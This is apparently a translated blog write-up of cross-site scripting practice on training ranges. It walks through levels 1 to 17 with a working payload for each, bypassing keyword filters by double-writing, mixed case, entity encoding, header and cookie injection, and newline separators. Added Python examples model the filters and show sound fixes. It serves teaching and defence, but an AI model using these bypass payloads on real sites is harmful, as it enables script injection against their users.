XSS shooting range practice

Range used: Yunyan cloud range

https://www.yunyansec.com/#/

Commonly used payloads

The script tag is used to define client-side scripts, such as JavaScript.

<script>alert(1)</script>
<script>alert("xss")</script>

The img tag defines an image in an HTML page

<img src=1 onerror=alert(1)>
<img src=1 onerror=alert("xss")>

The input tag specifies an input field where the user can enter data.

<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus>

<input onfocus="alert(1)" autofocus>

The details tag specifies additional details that the user can show or hide through an interactive control. The ontoggle event fires when the user opens or closes the element:

<details ontoggle=alert(1);>
<details open ontoggle=alert(1);>

The svg tag embeds the code of an SVG file directly in the HTML page.

<svg onload=alert(1);>

Other commonly used payloads are collected in the attached file commonly used payload.docx.

Level 1

Enter the payload in the URL:

Level 2

Enter qyx in the search bar and view the source code.

The input is reflected in the value attribute: for example, entering the string yunyansec shows yunyansec as the value of the input tag.

Bypass idea: just close the tag with "> or '>.

Level 3

When the input contains the dangerous string alert, it is cleared.

Bypass idea: double-write the alert function.

">aalertlert(1) or">

Level 4

When the input contains the dangerous string alert, script execution is aborted directly.

Bypass idea: use another pop-up function for testing, such as prompt(), which displays a dialog box asking the user for input.

"> or">

Level 5

Testing shows that this level deletes several dangerous strings, such as script, alert, on and img.

Bypass idea: double-write the dangerous strings.

">aalertlert(1) or">

Level 6

Testing shows that this level deletes even more dangerous strings: script, alert, on, img, <, src and others are all cleared.

Bypass idea: use an event; the onclick event fires when the element is clicked. Combine this with the order in which the program deletes the dangerous strings and double-write accordingly.

aaa" oimgnclick="alimgert(1)

XSS game

Level 1 (the JS pop-up function alert())

Look carefully at the three arrows: a name parameter with the value test is submitted to the server. The page echoes the value of the name parameter and the length of that value. Next, check the source code:

The value test of the GET parameter name is inserted into the HTML, and the length of the payload is echoed. So insert a piece of JS code directly into the GET parameter:

<script>alert('xss')</script>

**Of course, other payloads also pass the first level; refer to the common XSS trigger tags above.**

Level 2 (closing bypass)

View the source code of the website. First try inserting JS directly, as in the last level:

<script>alert('xss')</script>

If it does not succeed, check the source code of the website again.

The first output is HTML-entity escaped, but the second is not. We only need to close the double quote to construct the payload:

">  <script>alert()</script>  <"

Level 3 (onfocus bypasses HTML entity encoding, that is, the filtering of <>)

Enter something first and view the source code of the website.

Compared with the previous level, the value is enclosed in single quotes here. Try:

'>  <script>alert()</script>  <'

Unexpectedly, the symbols are all entity-encoded. Instead, construct an event: when the event occurs, JavaScript can be executed. For example, when the user clicks an HTML element, a function is called from the event handler. Here we use onclick; payload:

' onclick=alert() '

Level 4

Enter something first and check the source code of the website: only > and < are filtered out, so we continue to use an event to pass:

" onclick=alert() "

Level 5 (insert a tag to achieve JS execution)

Enter something first and check the source code of the website: the script tag is broken up with an underscore. Try the trigger event again, and find that onclick is also filtered.

<script>alert(1)</script>
<img src=ganyu onerror=alert(1)>
<svg onload=alert(1)>
<a href=javascript:alert(1)>

javascript is not filtered, so it is usable. Entering it directly fails, because the previous content is not closed:

" > <a href=javascript:alert('xss')>test</a>   # the pop-up is triggered by clicking test

Level 6 (upper/lower case bypasses the str_replace() function)

Enter something first and check the source code of the website to see what is filtered; we try onclick, javascript, onerror and onload.

Only javascript is not filtered. We try closing with

" > <a href=javascript:alert('xss')>test

but it fails. Checking the source code of the website shows that href is filtered; try double writing, mixed case, or encoding bypass:

" > <a HreF=javascript:alert('xss')>test</a>

Level 7 (double writing bypasses the delete function)

Enter something first and check the source code of the website: script has been deleted. We try double writing, mixed case, or encoding bypass, and find that double writing works:

<scrscriptipt>alert()</scrscriptipt>


 " ><scrscriptipt>alert()</scrscriptipt>
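Range levels 3, 5 and 6 and game level 7 all fall to the same weakness: each banned word is deleted once, in a fixed order, like a chain of str_replace() calls, so a word spelled around another banned word reassembles after the deletion. The Python below is an added example, not the range's or the lab's own code, and its keyword order is an assumption taken from the write-up; it models that filter, shows that repeating it to a fixed point only half helps, and shows the actual fix for this reflection point: encoding for the attribute context.

```python
import html

# Constructed model of the range's keyword filter (assumption based on the
# write-up): each keyword is deleted once, in this order, like a chain of
# str_replace() calls. Level 6's payload relies on "img" being removed after
# "on" and "alert", which is why "oimgnclick" becomes "onclick".
LEVEL6_DELETE_ORDER = ["script", "alert", "on", "img", "<", "src"]


def delete_keywords(value, order=LEVEL6_DELETE_ORDER):
    """Single-pass, case-sensitive deletion: what the levels do."""
    for word in order:
        value = value.replace(word, "")
    return value


def delete_until_stable(value, order=LEVEL6_DELETE_ORDER):
    """Repeat until nothing changes. This closes the double-write hole but is
    still a blacklist: characters not on the list (here the quote that closes
    the attribute) pass straight through."""
    while True:
        cleaned = delete_keywords(value, order)
        if cleaned == value:
            return cleaned
        value = cleaned


def render_value(user_input, sanitizer=delete_keywords):
    """Reflect the input into the value attribute the way the level does."""
    return f'<input name="keyword" value="{sanitizer(user_input)}">'


def render_value_encoded(user_input):
    """The real fix: encode for the attribute context instead of deleting.
    quote=True turns the double quote into &quot;, so the attribute can no
    longer be closed and no handler can be injected, whatever the spelling."""
    return f'<input name="keyword" value="{html.escape(user_input, quote=True)}">'


if __name__ == "__main__":
    payload = 'aaa" oimgnclick="alimgert(1)'  # the level-6 payload from the write-up
    print(render_value(payload))                        # handler survives the filter
    print(render_value(payload, delete_until_stable))   # no handler, but " still breaks out
    print(render_value_encoded(payload))                # inert
```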


Level 8 (the href attribute automatically parses Unicode encoding)

Enter something first and view the source code of the website.

Whatever we input is placed from value directly into href, and when the friendship link is clicked the parameters carried in are executed. Let's see which keywords are filtered: onclick, javascript, onerror, onload, script, href and data.

Try double writing, case, or encoding bypass; encoding works:

java&#115;&#99;&#114;&#105;&#112;&#116;:alert()
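For levels 8 and 9 the point is that the keyword check runs on the raw string while the browser decodes &#115; and the other references before following the link. The Python below is an added example, not the lab's own code; the keyword list comes from the write-up and the scheme allowlist is an assumed policy. It normalizes an href the way a browser does (entity decoding, control-character and tab/newline stripping, lowercasing) and then allowlists the scheme, so the encoded, mixed-case and whitespace variants are all rejected by one check.

```python
import html
import re

# Keywords the write-up says level 8 filters, checked on the raw string, i.e.
# before the browser's attribute parser decodes &#115; back to "s".
RAW_KEYWORDS = ["onclick", "javascript", "onerror", "onload", "script", "href", "data"]

# Allowlist of schemes a friendship link may use (assumed policy for this example).
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# URL scheme syntax: a letter followed by letters, digits, "+", "-" or ".".
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")
# C0 control characters and space, which browsers strip from both ends of a URL.
LEADING_TRAILING = "".join(map(chr, range(0x21)))


def raw_keyword_filter_blocks(value):
    """The level's own check: does any keyword appear literally in the input?"""
    return any(word in value for word in RAW_KEYWORDS)


def normalize_href(value):
    """Bring an href to the form the browser will actually act on:
    decode character references, strip leading/trailing controls and spaces,
    drop tab/CR/LF anywhere (the URL parser ignores them), then lowercase."""
    decoded = html.unescape(value)
    decoded = decoded.strip(LEADING_TRAILING)
    decoded = re.sub(r"[\t\r\n]", "", decoded)
    return decoded.lower()


def scheme_of(value):
    """Scheme of the normalized href, or "" for a relative URL."""
    match = SCHEME_RE.match(normalize_href(value))
    return match.group(1) if match else ""


def is_safe_href(value):
    """Allow relative URLs and allowlisted schemes only; everything else is
    rejected, so an entity-encoded or mixed-case javascript: URL never lands."""
    scheme = scheme_of(value)
    return scheme == "" or scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    encoded = "java&#115;&#99;&#114;&#105;&#112;&#116;:alert()"  # level-8 payload from the write-up
    print(raw_keyword_filter_blocks(encoded))  # False: the keyword check is fooled
    print(scheme_of(encoded))                  # javascript
    print(is_safe_href(encoded))               # False: rejected after normalization
```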


Level 9 (insert specified content to bypass the check)

First replace the input with javascript:alert; since script is filtered, entity-encode it as before. As mentioned earlier, this level detects http://, so try placing it after a comment:

java&#115;&#99;&#114;&#105;&#112;&#116;:alert() //http://

Level 10

There is no input point except the URL. Writing the script directly in the URL echoes it, and the source code shows that what we input is entity-encoded as HTML.
We can also see a form, but the page does not display its content: it uses input fields, which accept standard input data, and type="hidden" hides the field.

Their value is empty, so we try to supply values:

t_link=ganyu&t_history=ganyu&t_sort=ganyu

One line echoes our input. Construct the payload, then click the field:

?t_sort=" onfocus=javascript:alert() type="jack

Level 11

Right-click to view the source code and find a place similar to the previous level.

We continue as in the previous level, but this time we pass 4 parameters:

t_link=jack&t_history=jack&t_sort=jack&t_ref=jack

As you can see, the value of t_sort is displayed, and there is also a special referer field here. Those familiar with SQL injection will recognise Referer injection. We try passing the parameter through the Referer: open HackBar, enable the Referer field, and the value is echoed successfully. Construct the payload:

?t_ref=" onfocus=javascript:alert() type="jack

Level 12

Right-click to view the source code and find a place similar to the previous level: there is UA (User-Agent) injection, similar to SQL injection. Open HackBar, enable the UA field and construct the payload:

?t_ua=" onfocus=javascript:alert() type="jack

Level 13

Right-click to view the source code and find a place similar to the previous level, with a cook field hinting at the cookie. Open HackBar (F12), enable the Cookie field and construct the payload:

?t_cook=" onfocus=javascript:alert() type="jack

No success! Let's look at this page's cookie first. F12 shows a cookie named user. Now that we know the hidden user cookie, we continue to use HackBar to construct the payload:

user=?t_cook=" onfocus=javascript:alert() type="jack

Level 14

Unable to test.

Level 15

Check the source code of the website and find an ng-include. Its function is to include an HTML file from the same server, with the path passed in src. When the src resource is requested, the resource it points to is downloaded and applied to the document, such as JavaScript scripts or img images. Here we point src at any earlier level and input that level's XSS pop-up script:

?src='/level1.php?name=<img src=1 onmouseover=alert()>'

Level 16

After checking the website source code, the content of the keyword parameter is echoed, wrapped in a center tag (which centers the text). Test which keywords are filtered:

?keyword=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()> &#106;

The comparison shows that letters are lowercased first, then script is replaced with a space, and finally spaces are entity-encoded. I wanted to try the p tag <p onmousedown=alert()>abc, but it turns out that / is also replaced with a space.
The space can be replaced by a carriage return, whose URL encoding is %0a. Pick any of the usual tags, replace the spaces with the URL-encoded carriage return, and construct the payload:
?keyword=<img%0asrc=""%0aonerror=alert(1)>
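Level 16 shows why a filter that knows only the space character cannot stop an attribute from being injected: the HTML tokenizer accepts tab, LF, FF and CR as attribute separators too. The Python below is an added example, not the lab's code, and its model of the filter is an assumption based on the description above; it parses the reflected fragment with html.parser and flags any on* attribute, so the %0a variant is caught while the space variant shows the filter doing its job, and it also handles tab separators and mixed-case attribute names, which the write-up does not try.

```python
from html.parser import HTMLParser

# Constructed model of the level-16 filter as the write-up describes it
# (assumption about the exact replacement): lowercase, turn "script" and "/"
# into a space, then entity-encode the space. Only the space character is
# handled, so a newline between attributes is passed through untouched.
def level16_filter(keyword):
    keyword = keyword.lower().replace("script", " ").replace("/", " ")
    return keyword.replace(" ", "&nbsp;")


def render_center(keyword):
    """Where the level puts the filtered keyword."""
    return f"<center>{level16_filter(keyword)}</center>"


class EventHandlerFinder(HTMLParser):
    """Parse the fragment as a browser would and record every attribute whose
    name starts with "on". The tokenizer treats tab, LF, FF, CR and space alike
    as attribute separators and lowercases attribute names, so a check made
    here is not fooled by the whitespace or case tricks a string filter misses."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, name, value))


def find_event_handlers(fragment):
    """Return a list of (tag, attribute, value) for every inline event handler."""
    finder = EventHandlerFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    # The write-up's payload with %0a decoded: newlines instead of spaces.
    newline_payload = '<img\nsrc=""\nonerror=alert(1)>'
    print(level16_filter(newline_payload) == newline_payload)   # True: untouched
    print(find_event_handlers(render_center(newline_payload)))  # [('img', 'onerror', 'alert(1)')]
    print(find_event_handlers(render_center('<img src="" onerror=alert(1)>')))  # []
```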


Level 17

Check the source code and find an embed tag, which is used to embed content such as a plug-in. Try modifying the value to construct a payload (provided that you have the Flash plug-in):

?arg01=a&arg02 onfocus=alert(1)

Tools used

Firefox browser
Cloud training range


Origin blog.csdn.net/qq_62803993/article/details/128619511